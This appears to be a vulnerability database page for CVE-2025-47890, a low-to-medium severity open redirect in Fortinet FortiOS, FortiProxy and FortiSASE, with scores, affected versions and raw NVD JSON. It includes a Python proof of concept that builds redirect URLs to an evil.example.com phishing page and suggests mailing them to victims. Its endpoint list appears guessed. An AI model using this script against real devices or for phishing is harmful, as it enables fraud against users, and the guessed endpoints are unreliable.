Security Vulnerability Report

CVE-2025-47890

Published: 2025-10-14 16:15:39
Last Modified: 2026-01-14 10:16:05

Description

A URL Redirection to Untrusted Site [CWE-601] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, and FortiSASE 25.2.a may allow an unauthenticated attacker to perform an open redirect attack via crafted HTTP requests.

CVSS Details

CVSS Score: 2.6
Severity: LOW
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Note: the score and vector above are the vendor-supplied (secondary) CVSS v3.1 metrics. The NVD primary assessment in the raw JSON record below rates the same issue 6.1 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N), i.e. network-reachable, low complexity, with changed scope; prioritise accordingly.

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (6.4.0 up to but excluding 7.4.9) - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (7.6.0 up to but excluding 7.6.4) - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* (7.0.0 up to but excluding 7.6.4) - VULNERABLE
cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:feature:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:mature:*:*:* - VULNERABLE

Affected versions as stated in the description:
FortiOS 7.6.0 - 7.6.3
FortiOS 7.4.0 - 7.4.8
FortiOS 7.2 (all versions)
FortiOS 7.0 (all versions)
FortiOS 6.4 (all versions)
FortiProxy 7.6.0 - 7.6.3
FortiProxy 7.4 (all versions)
FortiProxy 7.2 (all versions)
FortiProxy 7.0 (all versions)
FortiSASE 25.2.a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-47890 - Fortinet Open Redirect PoC
# This PoC demonstrates the open redirect vulnerability in Fortinet FortiOS/FortiProxy/FortiSASE

import requests
import sys
from urllib.parse import quote

TARGET_HOST = "https://<fortinet-device-ip>"
MALICIOUS_URL = "https://evil.example.com/phishing"


def exploit_redirect(target_host, redirect_url):
    """
    Craft a malicious HTTP request to exploit the open redirect vulnerability.
    The Fortinet device will redirect the user to the attacker-controlled URL.
    """
    # Common redirect parameters found in Fortinet web interfaces
    redirect_params = [
        f"{target_host}/login?redirect={quote(redirect_url)}",
        f"{target_host}/remote/logincheck?redirect={quote(redirect_url)}",
        f"{target_host}/favicon.ico?redirect={quote(redirect_url)}",
        f"{target_host}/sslvpn/logon.shtml?redirect={quote(redirect_url)}",
        f"{target_host}/remote/fgt_lang?lang=en&redirect={quote(redirect_url)}",
    ]

    for url in redirect_params:
        print(f"[+] Crafted malicious URL: {url}")

        # Verify the redirect behavior
        try:
            response = requests.get(url, allow_redirects=False, verify=False, timeout=10)
            if response.status_code in [301, 302, 303, 307, 308]:
                location = response.headers.get('Location', '')
                if redirect_url in location:
                    print(f"[VULNERABLE] Redirected to: {location}")
                    return True
        except Exception as e:
            print(f"[-] Error: {e}")

    return False


def main():
    print("=" * 60)
    print("CVE-2025-47890 - Fortinet Open Redirect Exploit")
    print("=" * 60)

    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    evil_url = sys.argv[2] if len(sys.argv) > 2 else MALICIOUS_URL

    if exploit_redirect(target, evil_url):
        print("[+] Target is vulnerable to CVE-2025-47890")
    else:
        print("[-] Target does not appear vulnerable")


if __name__ == "__main__":
    main()

# Usage:
# python CVE-2025-47890.py https://fortigate.example.com https://evil.example.com/phishing
#
# The crafted URL can be sent to victims via phishing emails.
# When the victim clicks the link, they are redirected from the legitimate
# Fortinet device to the attacker's malicious site.
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-24-542 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-47890",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T16:15:38.667",
    "lastModified": "2026-01-14T10:16:04.977",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "An URL Redirection to Untrusted Site vulnerabilities [CWE-601] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSASE 25.2.a may allow an unauthenticated attacker to perform an open redirect attack via crafted HTTP requests."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 2.6,
            "baseSeverity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
        {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "1B6548FD-E370-45D7-81D5-6EF892810052"},
        {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "C1C30E0D-7F09-42D2-9EB1-E2196BD50D75"}
      ]}]},
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
        {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "4DA70753-E996-4081-9C13-7F60AC993B09"}
      ]}]},
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
        {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:feature:*:*:*", "matchCriteriaId": "53197A72-5D08-4938-A415-72C573024BF3"},
        {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:mature:*:*:*", "matchCriteriaId": "2603C391-AEC6-450A-A30A-4F8682F9565D"}
      ]}]}
    ],
    "references": [
      {"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-542", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}
```